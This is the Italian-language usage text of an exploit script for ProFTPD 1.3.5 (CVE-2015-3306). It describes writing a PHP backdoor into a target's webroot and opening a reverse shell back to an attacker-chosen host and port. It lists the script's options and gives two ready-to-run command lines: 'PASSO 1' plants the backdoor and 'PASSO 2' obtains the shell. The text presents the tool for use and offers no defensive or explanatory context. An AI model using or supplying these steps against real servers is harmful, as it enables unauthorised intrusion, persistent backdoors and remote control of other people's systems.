
Exploit per ProFTPD 1.3.5 CVE-2015-3306 che scrive una backdoor PHP nella webroot del target e genera una reverse shell per l'esecuzione remota di codice.
ProFTPd 1.3.5 RCE
Usage: ProFTPD.py [options]
Options:
-h, --help mostra questo messaggio di aiuto ed esci
-l LHOST, --lhost=LHOST
IP locale richiesto per Reverse Shell,
-p LPORT, --lport=LPORT
Porta richiesta per Reverse Shell,
-t TARGET, --target=TARGET
Target vulnerabile,
-d DIRECTORY, --dir=DIRECTORY
Directory WebRoot per caricare backdoor, Default: /var/www/html
-c COMMAND, --command=COMMAND
Comando di sistema,
-f FILE, --file=FILE
Nome backdoor, Default: shell.php.
PASSO 1 - Scrivi backdoor sulla macchina target!
Usage: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
PASSO 2 - Ottieni una shell!!
Usage: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242